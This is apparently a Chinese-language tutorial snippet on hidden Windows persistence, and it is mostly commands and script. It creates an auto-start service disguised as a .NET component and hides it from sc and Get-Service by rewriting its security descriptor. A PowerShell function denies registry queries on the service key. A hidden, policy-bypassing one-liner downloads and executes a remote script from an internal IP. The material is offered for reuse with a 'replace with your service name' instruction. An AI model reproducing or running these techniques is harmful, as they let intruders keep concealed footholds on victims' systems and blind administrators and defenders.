竹林寺
cmd powershell 选其一
# 1.cmd 创建自启动服务
sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\test.txt" depend= Tcpip obj= Localsystem start= auto |
# 2. powershell 创建自启动服务
new-service –Name ".NET CLR Networking 3.5.0.0" –DisplayName ".NET CLR Networking 3.5.0.0" –BinaryPathName "cmd.exe /k C:\test.txt" – StartupType AutomaticDelayedStart | |
new-service –Name ".NET CLR Networking 3.5.0.0" –DisplayName ".NET CLR Networking 3.5.0.0" –BinaryPathName "cmd.exe /k C:\test.txt" –StartupType AutomaticDelayedStart |
# 3. 通过修改 SDDL (安全描述符) 隐藏服务
sc sdset ".NET CLR Networking 3.5.0.0" "D:(D;;DCLCWPDTSD;;;IU) (D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU) (A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY) (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" |
# 4. 然后通过 sc 与 get-server 查找服务均无结果:
sc query |findstr ".NET CLR Networking 3.5.0.0" | |
get-service | findstr ".NET CLR Networking 3.5.0.0" |
# 5. 但这样做有一个问题:在注册表中很容易看到异常 value。
# 6. 修改注册表 ACL
我们可以通过修改注册表的 DACL 来拒绝对值的查询,达到隐藏异常值的效果。
** 这里给出一个通过 powershell 修改注册表项的访问权限的简单脚本: **
function Server-Sddl-Change{ | |
[CmdletBinding()] | |
param | |
( | |
[parameter(Mandatory=$false)][String]$Name | |
) | |
$ROOT = "HKLM:\SYSTEM\CurrentControlSet\Services\" | |
$S = $ROOT+$NAME | |
$acl = Get-Acl $S | |
$acl.SetAccessRuleProtection($true, $false) | |
$person = [System.Security.Principal.NTAccount]"Everyone" | |
$access = [System.Security.AccessControl.RegistryRights]"QueryValues" | |
$inheritance = [System.Security.AccessControl.InheritanceFlags]"None" | |
$propagation = [System.Security.AccessControl.PropagationFlags]"None" | |
$type = [System.Security.AccessControl.AccessControlType]"Deny" | |
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( ` | |
$person,$access,$inheritance,$propagation,$type) | |
$acl.AddAccessRule($rule) | |
$person = [System.Security.Principal.NTAccount]"Everyone" | |
$access = | |
[System.Security.AccessControl.RegistryRights]"SetValue,CreateSubKey,EnumerateSu | |
bKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,Chang | |
ePermissions,TakeOwnership" | |
$inheritance = [System.Security.AccessControl.InheritanceFlags]"None" | |
$propagation = [System.Security.AccessControl.PropagationFlags]"None" | |
$type = [System.Security.AccessControl.AccessControlType]"Allow" | |
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( ` | |
$person,$access,$inheritance,$propagation,$type) | |
$acl.AddAccessRule($rule) | |
Set-Acl $S $acl | |
} |
# 7. 远程加载 powershell 脚本:
powershell.exe -exec bypass -nop -w hidden -c "IEX((new-object | |
net.webclient).downloadstring('http://192.168.0.149/1.ps1'));Server-Sddl-Change - | |
Name '.NET CLR Networking 3.5.0.0' |
# 8. .NET CLR Networking 3.5.0.0 改成你的服务名 从下图可见已将值从该服务项中隐藏:
